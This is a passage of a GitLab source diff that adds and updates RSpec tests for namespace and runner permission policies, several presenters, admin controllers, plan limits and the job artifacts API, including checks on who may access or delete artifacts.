be_disallowed(:register_group_runners) } + end + end + end + + context 'admin' do + let(:current_user) { admin } + + context 'when admin mode is enabled', :enable_admin_mode do + it { is_expected.to be_allowed(:register_group_runners) } + + it_behaves_like 'expected outcome based on runner registration control' + end + + context 'when admin mode is disabled' do + it { is_expected.to be_disallowed(:register_group_runners) } + end + end + + context 'with owner' do + let(:current_user) { owner } + + it { is_expected.to be_allowed(:register_group_runners) } + + it_behaves_like 'expected outcome based on runner registration control' + end + + context 'with maintainer' do + let(:current_user) { maintainer } + + it { is_expected.to be_allowed(:register_group_runners) } + + it_behaves_like 'expected outcome based on runner registration control' + end + + context 'with reporter' do + let(:current_user) { reporter } + + it { is_expected.to be_disallowed(:register_group_runners) } + end + + context 'with guest' do + let(:current_user) { guest } + + it { is_expected.to be_disallowed(:register_group_runners) } + end + + context 'with non member' do + let(:current_user) { create(:user) } + + it { is_expected.to be_disallowed(:register_group_runners) } + end + + context 'with anonymous' do + let(:current_user) { nil } + + it { is_expected.to be_disallowed(:register_group_runners) } + end + end + context 'with customer_relations feature flag disabled' do let(:current_user) { owner } diff --git a/spec/policies/namespaces/project_namespace_policy_spec.rb b/spec/policies/namespaces/project_namespace_policy_spec.rb index 5bb38deb498..f6fe4ae552a 100644 --- a/spec/policies/namespaces/project_namespace_policy_spec.rb +++ b/spec/policies/namespaces/project_namespace_policy_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe NamespacePolicy do +RSpec.describe Namespaces::ProjectNamespacePolicy do let_it_be(:parent) { create(:namespace) } let_it_be(:project) { create(:project, 
namespace: parent) } let_it_be(:namespace) { project.project_namespace } @@ -37,7 +37,7 @@ RSpec.describe NamespacePolicy do let_it_be(:current_user) { create(:admin) } context 'when admin mode is enabled', :enable_admin_mode do - it { is_expected.to be_allowed(*permissions) } + it { is_expected.to be_disallowed(*permissions) } end context 'when admin mode is disabled' do diff --git a/spec/policies/namespaces/user_namespace_policy_spec.rb b/spec/policies/namespaces/user_namespace_policy_spec.rb index 02eda31bfa7..06db2f6e243 100644 --- a/spec/policies/namespaces/user_namespace_policy_spec.rb +++ b/spec/policies/namespaces/user_namespace_policy_spec.rb @@ -3,10 +3,10 @@ require 'spec_helper' RSpec.describe Namespaces::UserNamespacePolicy do - let(:user) { create(:user) } - let(:owner) { create(:user) } - let(:admin) { create(:admin) } - let(:namespace) { create(:namespace, owner: owner) } + let_it_be(:user) { create(:user) } + let_it_be(:owner) { create(:user) } + let_it_be(:admin) { create(:admin) } + let_it_be(:namespace) { create(:user_namespace, owner: owner) } let(:owner_permissions) { [:owner_access, :create_projects, :admin_namespace, :read_namespace, :read_statistics, :transfer_projects, :create_package_settings, :read_package_settings] } @@ -74,4 +74,26 @@ RSpec.describe Namespaces::UserNamespacePolicy do it { is_expected.to be_disallowed(:create_jira_connect_subscription) } end end + + describe 'create projects' do + using RSpec::Parameterized::TableSyntax + + let(:current_user) { owner } + + context 'when user can create projects' do + before do + allow(current_user).to receive(:can_create_project?).and_return(true) + end + + it { is_expected.to be_allowed(:create_projects) } + end + + context 'when user cannot create projects' do + before do + allow(current_user).to receive(:can_create_project?).and_return(false) + end + + it { is_expected.to be_disallowed(:create_projects) } + end + end end diff --git a/spec/presenters/blob_presenter_spec.rb 
b/spec/presenters/blob_presenter_spec.rb index 28e18708eab..8c0347b3c8d 100644 --- a/spec/presenters/blob_presenter_spec.rb +++ b/spec/presenters/blob_presenter_spec.rb @@ -31,6 +31,28 @@ RSpec.describe BlobPresenter do it { expect(presenter.replace_path).to eq("/#{project.full_path}/-/create/#{blob.commit_id}/#{blob.path}") } end + describe '#can_current_user_push_to_branch' do + let(:branch_exists) { true } + + before do + allow(project.repository).to receive(:branch_exists?).with(blob.commit_id).and_return(branch_exists) + end + + it { expect(presenter.can_current_user_push_to_branch?).to eq(true) } + + context 'current_user is nil' do + let(:user) { nil } + + it { expect(presenter.can_current_user_push_to_branch?).to eq(false) } + end + + context 'branch does not exist' do + let(:branch_exists) { false } + + it { expect(presenter.can_current_user_push_to_branch?).to eq(false) } + end + end + describe '#pipeline_editor_path' do context 'when blob is .gitlab-ci.yml' do before do @@ -45,6 +67,10 @@ RSpec.describe BlobPresenter do end end + describe '#code_owners' do + it { expect(presenter.code_owners).to match_array([]) } + end + describe '#ide_edit_path' do it { expect(presenter.ide_edit_path).to eq("/-/ide/project/#{project.full_path}/edit/HEAD/-/files/ruby/regex.rb") } end @@ -133,27 +159,25 @@ RSpec.describe BlobPresenter do presenter.highlight end end - end - describe '#highlight_transformed' do context 'when blob is ipynb' do let(:blob) { repository.blob_at('f6b7a707', 'files/ipython/markdown-table.ipynb') } let(:git_blob) { blob.__getobj__ } before do - allow(git_blob).to receive(:transformed_for_diff).and_return(true) + allow(Gitlab::Diff::CustomDiff).to receive(:transformed_for_diff?).and_return(true) end it 'uses md as the transformed language' do expect(Gitlab::Highlight).to receive(:highlight).with('files/ipython/markdown-table.ipynb', anything, plain: nil, language: 'md') - presenter.highlight_transformed + presenter.highlight end it 'transforms the 
blob' do expect(Gitlab::Highlight).to receive(:highlight).with('files/ipython/markdown-table.ipynb', include("%%"), plain: nil, language: 'md') - presenter.highlight_transformed + presenter.highlight end end @@ -171,7 +195,7 @@ RSpec.describe BlobPresenter do it 'does not transform the file' do expect(Gitlab::Highlight).to receive(:highlight).with('files/ruby/regex.rb', git_blob.data, plain: nil, language: 'ruby') - presenter.highlight_transformed + presenter.highlight end end end diff --git a/spec/presenters/ci/pipeline_presenter_spec.rb b/spec/presenters/ci/pipeline_presenter_spec.rb index 2d3c0d85eda..a278d4dad83 100644 --- a/spec/presenters/ci/pipeline_presenter_spec.rb +++ b/spec/presenters/ci/pipeline_presenter_spec.rb @@ -122,6 +122,30 @@ RSpec.describe Ci::PipelinePresenter do end end + describe '#coverage' do + subject { presenter.coverage } + + context 'when pipeline has coverage' do + before do + allow(pipeline).to receive(:coverage).and_return(35.0) + end + + it 'formats coverage into 2 decimal points' do + expect(subject).to eq('35.00') + end + end + + context 'when pipeline does not have coverage' do + before do + allow(pipeline).to receive(:coverage).and_return(nil) + end + + it 'returns nil' do + expect(subject).to be_nil + end + end + end + describe '#ref_text' do subject { presenter.ref_text } diff --git a/spec/presenters/merge_request_presenter_spec.rb b/spec/presenters/merge_request_presenter_spec.rb index b3ec184d08c..60296cca058 100644 --- a/spec/presenters/merge_request_presenter_spec.rb +++ b/spec/presenters/merge_request_presenter_spec.rb @@ -632,4 +632,28 @@ RSpec.describe MergeRequestPresenter do it { is_expected.to eq(expose_path("/api/v4/projects/#{project.id}/merge_requests/#{resource.iid}/unapprove")) } end + + describe '#pipeline_coverage_delta' do + subject { described_class.new(resource, current_user: user).pipeline_coverage_delta } + + context 'when merge request has pipeline coverage delta' do + before do + allow(resource).to 
receive(:pipeline_coverage_delta).and_return(35.0) + end + + it 'formats coverage into 2 decimal points' do + expect(subject).to eq('35.00') + end + end + + context 'when merge request does not have pipeline coverage delta' do + before do + allow(resource).to receive(:pipeline_coverage_delta).and_return(nil) + end + + it 'returns nil' do + expect(subject).to be_nil + end + end + end end diff --git a/spec/presenters/packages/npm/package_presenter_spec.rb b/spec/presenters/packages/npm/package_presenter_spec.rb index 49046492ab4..3b6dfcd20b8 100644 --- a/spec/presenters/packages/npm/package_presenter_spec.rb +++ b/spec/presenters/packages/npm/package_presenter_spec.rb @@ -32,22 +32,15 @@ RSpec.describe ::Packages::Npm::PackagePresenter do } end - let(:presenter) { described_class.new(package_name, packages, include_metadata: include_metadata) } + let(:presenter) { described_class.new(package_name, packages) } subject { presenter.versions } - where(:has_dependencies, :has_metadatum, :include_metadata) do - true | true | true - false | true | true - true | false | true - false | false | true - - # TODO : to remove along with packages_npm_abbreviated_metadata - # See https://gitlab.com/gitlab-org/gitlab/-/issues/344827 - true | true | false - false | true | false - true | false | false - false | false | false + where(:has_dependencies, :has_metadatum) do + true | true + false | true + true | false + false | false end with_them do @@ -80,7 +73,7 @@ RSpec.describe ::Packages::Npm::PackagePresenter do context 'metadatum' do ::Packages::Npm::PackagePresenter::PACKAGE_JSON_ALLOWED_FIELDS.each do |metadata_field| - if params[:has_metadatum] && params[:include_metadata] + if params[:has_metadatum] it { expect(subject.dig(package1.version, metadata_field)).not_to be nil } else it { expect(subject.dig(package1.version, metadata_field)).to be nil } diff --git a/spec/presenters/projects/security/configuration_presenter_spec.rb 
b/spec/presenters/projects/security/configuration_presenter_spec.rb new file mode 100644 index 00000000000..836753d0483 --- /dev/null +++ b/spec/presenters/projects/security/configuration_presenter_spec.rb @@ -0,0 +1,301 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Projects::Security::ConfigurationPresenter do + include Gitlab::Routing.url_helpers + using RSpec::Parameterized::TableSyntax + + let(:project_with_repo) { create(:project, :repository) } + let(:project_with_no_repo) { create(:project) } + let(:current_user) { create(:user) } + let(:presenter) { described_class.new(project, current_user: current_user) } + + before do + stub_licensed_features(licensed_scan_types.to_h { |type| [type, true] }) + + stub_feature_flags(corpus_management: false) + end + + describe '#to_html_data_attribute' do + subject(:html_data) { presenter.to_html_data_attribute } + + context 'when latest default branch pipeline`s source is not auto devops' do + let(:project) { project_with_repo } + + let(:pipeline) do + create( + :ci_pipeline, + project: project, + ref: project.default_branch, + sha: project.commit.sha + ) + end + + let!(:build_sast) { create(:ci_build, :sast, pipeline: pipeline) } + let!(:build_dast) { create(:ci_build, :dast, pipeline: pipeline) } + let!(:build_license_scanning) { create(:ci_build, :license_scanning, pipeline: pipeline) } + + it 'includes links to auto devops and secure product docs' do + expect(html_data[:auto_devops_help_page_path]).to eq(help_page_path('topics/autodevops/index')) + expect(html_data[:help_page_path]).to eq(help_page_path('user/application_security/index')) + end + + it 'returns info that Auto DevOps is not enabled' do + expect(html_data[:auto_devops_enabled]).to eq(false) + expect(html_data[:auto_devops_path]).to eq(project_settings_ci_cd_path(project, anchor: 'autodevops-settings')) + end + + it 'includes a link to the latest pipeline' do + expect(html_data[:latest_pipeline_path]).to 
eq(project_pipeline_path(project, pipeline)) + end + + it 'has stubs for autofix' do + expect(html_data.keys).to include(:can_toggle_auto_fix_settings, :auto_fix_enabled, :auto_fix_user_path) + end + + context "while retrieving information about user's ability to enable auto_devops" do + where(:is_admin, :archived, :feature_available, :result) do + true | true | true | false + false | true | true | false + true | false | true | true + false | false | true | false + true | true | false | false + false | true | false | false + true | false | false | false + false | false | false | false + end + + with_them do + before do + allow_next_instance_of(described_class) do |presenter| + allow(presenter).to receive(:can?).and_return(is_admin) + allow(presenter).to receive(:archived?).and_return(archived) + allow(presenter).to receive(:feature_available?).and_return(feature_available) + end + end + + it 'includes can_enable_auto_devops' do + expect(html_data[:can_enable_auto_devops]).to eq(result) + end + end + end + + it 'includes feature information' do + feature = Gitlab::Json.parse(html_data[:features]).find { |scan| scan['type'] == 'sast' } + + expect(feature['type']).to eq('sast') + expect(feature['configured']).to eq(true) + expect(feature['configuration_path']).to eq(project_security_configuration_sast_path(project)) + expect(feature['available']).to eq(true) + end + + context 'when checking features configured status' do + let(:features) { Gitlab::Json.parse(html_data[:features]) } + + where(:type, :configured) do + :dast | true + :dast_profiles | true + :sast | true + :sast_iac | false + :container_scanning | false + :cluster_image_scanning | false + :dependency_scanning | false + :license_scanning | true + :secret_detection | false + :coverage_fuzzing | false + :api_fuzzing | false + :corpus_management | true + end + + with_them do + it 'returns proper configuration status' do + feature = features.find { |scan| scan['type'] == type.to_s } + + 
expect(feature['configured']).to eq(configured) + end + end + end + + context 'when the job has more than one report' do + let(:features) { Gitlab::Json.parse(html_data[:features]) } + + let!(:artifacts) do + { artifacts: { reports: { other_job: ['gl-other-report.json'], sast: ['gl-sast-report.json'] } } } + end + + let!(:complicated_job) { build_stubbed(:ci_build, options: artifacts) } + + before do + allow_next_instance_of(::Security::SecurityJobsFinder) do |finder| + allow(finder).to receive(:execute).and_return([complicated_job]) + end + end + + where(:type, :configured) do + :dast | false + :dast_profiles | true + :sast | true + :sast_iac | false + :container_scanning | false + :cluster_image_scanning | false + :dependency_scanning | false + :license_scanning | true + :secret_detection | false + :coverage_fuzzing | false + :api_fuzzing | false + :corpus_management | true + end + + with_them do + it 'properly detects security jobs' do + feature = features.find { |scan| scan['type'] == type.to_s } + + expect(feature['configured']).to eq(configured) + end + end + end + + it 'includes a link to the latest pipeline' do + expect(subject[:latest_pipeline_path]).to eq(project_pipeline_path(project, pipeline)) + end + + context "while retrieving information about gitlab ci file" do + context 'when a .gitlab-ci.yml file exists' do + let!(:ci_config) do + project.repository.create_file( + project.creator, + Gitlab::FileDetector::PATTERNS[:gitlab_ci], + 'contents go here', + message: 'test', + branch_name: 'master') + end + + it 'expects gitlab_ci_present to be true' do + expect(html_data[:gitlab_ci_present]).to eq(true) + end + end + + context 'when a .gitlab-ci.yml file does not exist' do + it 'expects gitlab_ci_present to be false if the file is not present' do + expect(html_data[:gitlab_ci_present]).to eq(false) + end + end + end + + it 'includes the path to gitlab_ci history' do + expect(subject[:gitlab_ci_history_path]).to eq(project_blame_path(project, 
'master/.gitlab-ci.yml')) + end + end + + context 'when the project is empty' do + let(:project) { project_with_no_repo } + + it 'includes a blank gitlab_ci history path' do + expect(html_data[:gitlab_ci_history_path]).to eq('') + end + end + + context 'when the project has no default branch set' do + let(:project) { project_with_repo } + + it 'includes the path to gitlab_ci history' do + allow(project).to receive(:default_branch).and_return(nil) + + expect(html_data[:gitlab_ci_history_path]).to eq(project_blame_path(project, 'master/.gitlab-ci.yml')) + end + end + + context "when the latest default branch pipeline's source is auto devops" do + let(:project) { project_with_repo } + + let(:pipeline) do + create( + :ci_pipeline, + :auto_devops_source, + project: project, + ref: project.default_branch, + sha: project.commit.sha + ) + end + + let!(:build_sast) { create(:ci_build, :sast, pipeline: pipeline, status: 'success') } + let!(:build_dast) { create(:ci_build, :dast, pipeline: pipeline, status: 'success') } + let!(:ci_build) { create(:ci_build, :secret_detection, pipeline: pipeline, status: 'pending') } + + it 'reports that auto devops is enabled' do + expect(html_data[:auto_devops_enabled]).to be_truthy + end + + context 'when gathering feature data' do + let(:features) { Gitlab::Json.parse(html_data[:features]) } + + where(:type, :configured) do + :dast | true + :dast_profiles | true + :sast | true + :sast_iac | false + :container_scanning | false + :cluster_image_scanning | false + :dependency_scanning | false + :license_scanning | false + :secret_detection | true + :coverage_fuzzing | false + :api_fuzzing | false + :corpus_management | true + end + + with_them do + it 'reports that all scanners are configured for which latest pipeline has builds' do + feature = features.find { |scan| scan['type'] == type.to_s } + + expect(feature['configured']).to eq(configured) + end + end + end + end + + context 'when the project has no default branch pipeline' do + 
let(:project) { project_with_repo } + + it 'reports that auto devops is disabled' do + expect(html_data[:auto_devops_enabled]).to be_falsy + end + + it 'includes a link to CI pipeline docs' do + expect(html_data[:latest_pipeline_path]).to eq(help_page_path('ci/pipelines')) + end + + context 'when gathering feature data' do + let(:features) { Gitlab::Json.parse(html_data[:features]) } + + where(:type, :configured) do + :dast | false + :dast_profiles | true + :sast | false + :sast_iac | false + :container_scanning | false + :cluster_image_scanning | false + :dependency_scanning | false + :license_scanning | false + :secret_detection | false + :coverage_fuzzing | false + :api_fuzzing | false + :corpus_management | true + end + + with_them do + it 'reports all security jobs as unconfigured with exception of "fake" jobs' do + feature = features.find { |scan| scan['type'] == type.to_s } + + expect(feature['configured']).to eq(configured) + end + end + end + end + + def licensed_scan_types + ::Security::SecurityJobsFinder.allowed_job_types + ::Security::LicenseComplianceJobsFinder.allowed_job_types - [:cluster_image_scanning] + end + end +end diff --git a/spec/requests/admin/integrations_controller_spec.rb b/spec/requests/admin/integrations_controller_spec.rb new file mode 100644 index 00000000000..cfb40063095 --- /dev/null +++ b/spec/requests/admin/integrations_controller_spec.rb @@ -0,0 +1,50 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Admin::IntegrationsController, :enable_admin_mode do + let_it_be(:admin) { create(:admin) } + + before do + sign_in(admin) + end + + describe 'GET #overrides' do + let_it_be(:integration) { create(:jira_integration, :instance) } + let_it_be(:overridden_integration) { create(:jira_integration) } + let_it_be(:overridden_other_integration) { create(:confluence_integration) } + + let(:overrides_path) { overrides_admin_application_settings_integration_path(integration, format: format) } + + context 'format 
html' do + let(:format) { :html } + + it 'renders' do + get overrides_path + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to render_template('shared/integrations/overrides') + end + end + + context 'format json' do + let(:format) { :json } + let(:project) { overridden_integration.project } + + it 'returns the project overrides data' do + get overrides_path + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to include_pagination_headers + expect(json_response).to contain_exactly( + { + 'avatar_url' => project.avatar_url, + 'full_name' => project.full_name, + 'name' => project.name, + 'full_path' => project_path(project) + } + ) + end + end + end +end diff --git a/spec/requests/admin/version_check_controller_spec.rb b/spec/requests/admin/version_check_controller_spec.rb new file mode 100644 index 00000000000..7e2f33d5bc5 --- /dev/null +++ b/spec/requests/admin/version_check_controller_spec.rb @@ -0,0 +1,50 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Admin::VersionCheckController, :enable_admin_mode do + let(:admin) { create(:admin) } + + before do + sign_in(admin) + end + + describe 'GET #version_check' do + context 'when VersionCheck.response is nil' do + before do + allow_next_instance_of(VersionCheck) do |instance| + allow(instance).to receive(:response).and_return(nil) + end + get admin_version_check_path + end + + it 'returns nil' do + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to be_nil + end + + it 'sets no-cache headers' do + expect(response.headers['Cache-Control']).to eq('max-age=0, private, must-revalidate') + end + end + + context 'when VersionCheck.response is valid' do + before do + allow_next_instance_of(VersionCheck) do |instance| + allow(instance).to receive(:response).and_return({ "severity" => "success" }) + end + + get admin_version_check_path + end + + it 'returns the valid data' do + expect(response).to have_gitlab_http_status(:ok) + 
expect(json_response).to eq({ "severity" => "success" }) + end + + it 'sets proper cache headers' do + expect(response.headers['Cache-Control']).to eq('max-age=60, private') + end + end + end +end diff --git a/spec/requests/api/admin/plan_limits_spec.rb b/spec/requests/api/admin/plan_limits_spec.rb index f497227789a..03642ad617e 100644 --- a/spec/requests/api/admin/plan_limits_spec.rb +++ b/spec/requests/api/admin/plan_limits_spec.rb @@ -25,6 +25,7 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do expect(json_response).to be_an Hash expect(json_response['conan_max_file_size']).to eq(Plan.default.actual_limits.conan_max_file_size) expect(json_response['generic_packages_max_file_size']).to eq(Plan.default.actual_limits.generic_packages_max_file_size) + expect(json_response['helm_max_file_size']).to eq(Plan.default.actual_limits.helm_max_file_size) expect(json_response['maven_max_file_size']).to eq(Plan.default.actual_limits.maven_max_file_size) expect(json_response['npm_max_file_size']).to eq(Plan.default.actual_limits.npm_max_file_size) expect(json_response['nuget_max_file_size']).to eq(Plan.default.actual_limits.nuget_max_file_size) @@ -45,6 +46,7 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do expect(json_response).to be_an Hash expect(json_response['conan_max_file_size']).to eq(Plan.default.actual_limits.conan_max_file_size) expect(json_response['generic_packages_max_file_size']).to eq(Plan.default.actual_limits.generic_packages_max_file_size) + expect(json_response['helm_max_file_size']).to eq(Plan.default.actual_limits.helm_max_file_size) expect(json_response['maven_max_file_size']).to eq(Plan.default.actual_limits.maven_max_file_size) expect(json_response['npm_max_file_size']).to eq(Plan.default.actual_limits.npm_max_file_size) expect(json_response['nuget_max_file_size']).to eq(Plan.default.actual_limits.nuget_max_file_size) @@ -84,6 +86,7 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do 'plan_name': 'default', 'conan_max_file_size': 
10, 'generic_packages_max_file_size': 20, + 'helm_max_file_size': 25, 'maven_max_file_size': 30, 'npm_max_file_size': 40, 'nuget_max_file_size': 50, @@ -95,6 +98,7 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do expect(json_response).to be_an Hash expect(json_response['conan_max_file_size']).to eq(10) expect(json_response['generic_packages_max_file_size']).to eq(20) + expect(json_response['helm_max_file_size']).to eq(25) expect(json_response['maven_max_file_size']).to eq(30) expect(json_response['npm_max_file_size']).to eq(40) expect(json_response['nuget_max_file_size']).to eq(50) @@ -129,6 +133,7 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do 'plan_name': 'default', 'conan_max_file_size': 'a', 'generic_packages_max_file_size': 'b', + 'helm_max_file_size': 'h', 'maven_max_file_size': 'c', 'npm_max_file_size': 'd', 'nuget_max_file_size': 'e', @@ -140,8 +145,8 @@ RSpec.describe API::Admin::PlanLimits, 'PlanLimits' do expect(json_response['error']).to include( 'conan_max_file_size is invalid', 'generic_packages_max_file_size is invalid', + 'helm_max_file_size is invalid', 'maven_max_file_size is invalid', - 'generic_packages_max_file_size is invalid', 'npm_max_file_size is invalid', 'nuget_max_file_size is invalid', 'pypi_max_file_size is invalid', diff --git a/spec/requests/api/ci/job_artifacts_spec.rb b/spec/requests/api/ci/job_artifacts_spec.rb new file mode 100644 index 00000000000..585fab33708 --- /dev/null +++ b/spec/requests/api/ci/job_artifacts_spec.rb @@ -0,0 +1,661 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe API::Ci::JobArtifacts do + include HttpBasicAuthHelpers + include DependencyProxyHelpers + + include HttpIOHelpers + + let_it_be(:project, reload: true) do + create(:project, :repository, public_builds: false) + end + + let_it_be(:pipeline, reload: true) do + create(:ci_pipeline, project: project, + sha: project.commit.id, + ref: project.default_branch) + end + + let(:user) { create(:user) } + 
let(:api_user) { user } + let(:reporter) { create(:project_member, :reporter, project: project).user } + let(:guest) { create(:project_member, :guest, project: project).user } + + let!(:job) do + create(:ci_build, :success, :tags, pipeline: pipeline, + artifacts_expire_at: 1.day.since) + end + + before do + project.add_developer(user) + end + + shared_examples 'returns unauthorized' do + it 'returns unauthorized' do + expect(response).to have_gitlab_http_status(:unauthorized) + end + end + + describe 'DELETE /projects/:id/jobs/:job_id/artifacts' do + let!(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } + + before do + delete api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + end + + context 'when user is anonymous' do + let(:api_user) { nil } + + it 'does not delete artifacts' do + expect(job.job_artifacts.size).to eq 2 + end + + it 'returns status 401 (unauthorized)' do + expect(response).to have_gitlab_http_status(:unauthorized) + end + end + + context 'with developer' do + it 'does not delete artifacts' do + expect(job.job_artifacts.size).to eq 2 + end + + it 'returns status 403 (forbidden)' do + expect(response).to have_gitlab_http_status(:forbidden) + end + end + + context 'with authorized user' do + let(:maintainer) { create(:project_member, :maintainer, project: project).user } + let!(:api_user) { maintainer } + + it 'deletes artifacts' do + expect(job.job_artifacts.size).to eq 0 + end + + it 'returns status 204 (no content)' do + expect(response).to have_gitlab_http_status(:no_content) + end + end + end + + describe 'GET /projects/:id/jobs/:job_id/artifacts/:artifact_path' do + context 'when job has artifacts' do + let(:job) { create(:ci_build, :artifacts, pipeline: pipeline) } + + let(:artifact) do + 'other_artifacts_0.1.2/another-subdirectory/banana_sample.gif' + end + + context 'when user is anonymous' do + let(:api_user) { nil } + + context 'when project is public' do + it 'allows to access artifacts' do + 
project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PUBLIC) + project.update_column(:public_builds, true) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + end + end + + context 'when project is public with artifacts that are non public' do + let(:job) { create(:ci_build, :artifacts, :non_public_artifacts, pipeline: pipeline) } + + it 'rejects access to artifacts' do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PUBLIC) + project.update_column(:public_builds, true) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:forbidden) + end + + context 'with the non_public_artifacts feature flag disabled' do + before do + stub_feature_flags(non_public_artifacts: false) + end + + it 'allows access to artifacts' do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PUBLIC) + project.update_column(:public_builds, true) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + end + end + end + + context 'when project is public with builds access disabled' do + it 'rejects access to artifacts' do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PUBLIC) + project.update_column(:public_builds, false) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:forbidden) + end + end + + context 'when project is private' do + it 'rejects access and hides existence of artifacts' do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PRIVATE) + project.update_column(:public_builds, true) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + + context 'when user is authorized' do + it 'returns a specific artifact file for a valid path' do + expect(Gitlab::Workhorse) + .to receive(:send_artifacts_entry) + .and_call_original + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + 
expect(response.headers.to_h) + .to include('Content-Type' => 'application/json', + 'Gitlab-Workhorse-Send-Data' => /artifacts-entry/) + expect(response.parsed_body).to be_empty + end + + context 'when artifacts are locked' do + it 'allows access to expired artifact' do + pipeline.artifacts_locked! + job.update!(artifacts_expire_at: Time.now - 7.days) + + get_artifact_file(artifact) + + expect(response).to have_gitlab_http_status(:ok) + end + end + end + end + + context 'when job does not have artifacts' do + it 'does not return job artifact file' do + get_artifact_file('some/artifact') + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + def get_artifact_file(artifact_path) + get api("/projects/#{project.id}/jobs/#{job.id}/" \ + "artifacts/#{artifact_path}", api_user) + end + end + + describe 'GET /projects/:id/jobs/:job_id/artifacts' do + shared_examples 'downloads artifact' do + let(:download_headers) do + { 'Content-Transfer-Encoding' => 'binary', + 'Content-Disposition' => %q(attachment; filename="ci_build_artifacts.zip"; filename*=UTF-8''ci_build_artifacts.zip) } + end + + it 'returns specific job artifacts' do + subject + + expect(response).to have_gitlab_http_status(:ok) + expect(response.headers.to_h).to include(download_headers) + expect(response.body).to match_file(job.artifacts_file.file.file) + end + end + + context 'normal authentication' do + context 'job with artifacts' do + context 'when artifacts are stored locally' do + let(:job) { create(:ci_build, :artifacts, pipeline: pipeline) } + + subject { get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) } + + context 'authorized user' do + it_behaves_like 'downloads artifact' + end + + context 'when job token is used' do + let(:other_job) { create(:ci_build, :running, user: user) } + + subject { get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", job_token: other_job.token) } + + before do + stub_licensed_features(cross_project_pipelines: true) + end + + 
it_behaves_like 'downloads artifact' + + context 'when job token scope is enabled' do + before do + other_job.project.ci_cd_settings.update!(job_token_scope_enabled: true) + end + + it 'does not allow downloading artifacts' do + subject + + expect(response).to have_gitlab_http_status(:not_found) + end + + context 'when project is added to the job token scope' do + let!(:link) { create(:ci_job_token_project_scope_link, source_project: other_job.project, target_project: job.project) } + + it_behaves_like 'downloads artifact' + end + end + end + + context 'unauthorized user' do + let(:api_user) { nil } + + it 'does not return specific job artifacts' do + subject + + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + + context 'when artifacts are stored remotely' do + let(:proxy_download) { false } + let(:job) { create(:ci_build, pipeline: pipeline) } + let(:artifact) { create(:ci_job_artifact, :archive, :remote_store, job: job) } + + before do + stub_artifacts_object_storage(proxy_download: proxy_download) + + artifact + job.reload + + get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + end + + context 'when proxy download is enabled' do + let(:proxy_download) { true } + + it 'responds with the workhorse send-url' do + expect(response.headers[Gitlab::Workhorse::SEND_DATA_HEADER]).to start_with("send-url:") + end + end + + context 'when proxy download is disabled' do + it 'returns location redirect' do + expect(response).to have_gitlab_http_status(:found) + end + end + + context 'authorized user' do + it 'returns the file remote URL' do + expect(response).to redirect_to(artifact.file.url) + end + end + + context 'unauthorized user' do + let(:api_user) { nil } + + it 'does not return specific job artifacts' do + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + + context 'when public project guest and artifacts are non public' do + let(:api_user) { guest } + let(:job) { create(:ci_build, :artifacts, 
:non_public_artifacts, pipeline: pipeline) } + + before do + project.update_column(:visibility_level, + Gitlab::VisibilityLevel::PUBLIC) + project.update_column(:public_builds, true) + get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + end + + it 'rejects access and hides existence of artifacts' do + expect(response).to have_gitlab_http_status(:forbidden) + end + + context 'with the non_public_artifacts feature flag disabled' do + before do + stub_feature_flags(non_public_artifacts: false) + get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + end + + it 'allows access to artifacts' do + expect(response).to have_gitlab_http_status(:ok) + end + end + end + + it 'does not return job artifacts if not uploaded' do + get api("/projects/#{project.id}/jobs/#{job.id}/artifacts", api_user) + + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + end + + describe 'GET /projects/:id/artifacts/:ref_name/download?job=name' do + let(:api_user) { reporter } + let(:job) { create(:ci_build, :artifacts, pipeline: pipeline, user: api_user) } + + before do + stub_artifacts_object_storage + job.success + end + + def get_for_ref(ref = pipeline.ref, job_name = job.name) + get api("/projects/#{project.id}/jobs/artifacts/#{ref}/download", api_user), params: { job: job_name } + end + + context 'when not logged in' do + let(:api_user) { nil } + + before do + get_for_ref + end + + it 'does not find a resource in a private project' do + expect(project).to be_private + expect(response).to have_gitlab_http_status(:not_found) + end + end + + context 'when logging as guest' do + let(:api_user) { guest } + + before do + get_for_ref + end + + it 'gives 403' do + expect(response).to have_gitlab_http_status(:forbidden) + end + end + + context 'non-existing job' do + shared_examples 'not found' do + it { expect(response).to have_gitlab_http_status(:not_found) } + end + + context 'has no such ref' do + before do + get_for_ref('TAIL') + end + 
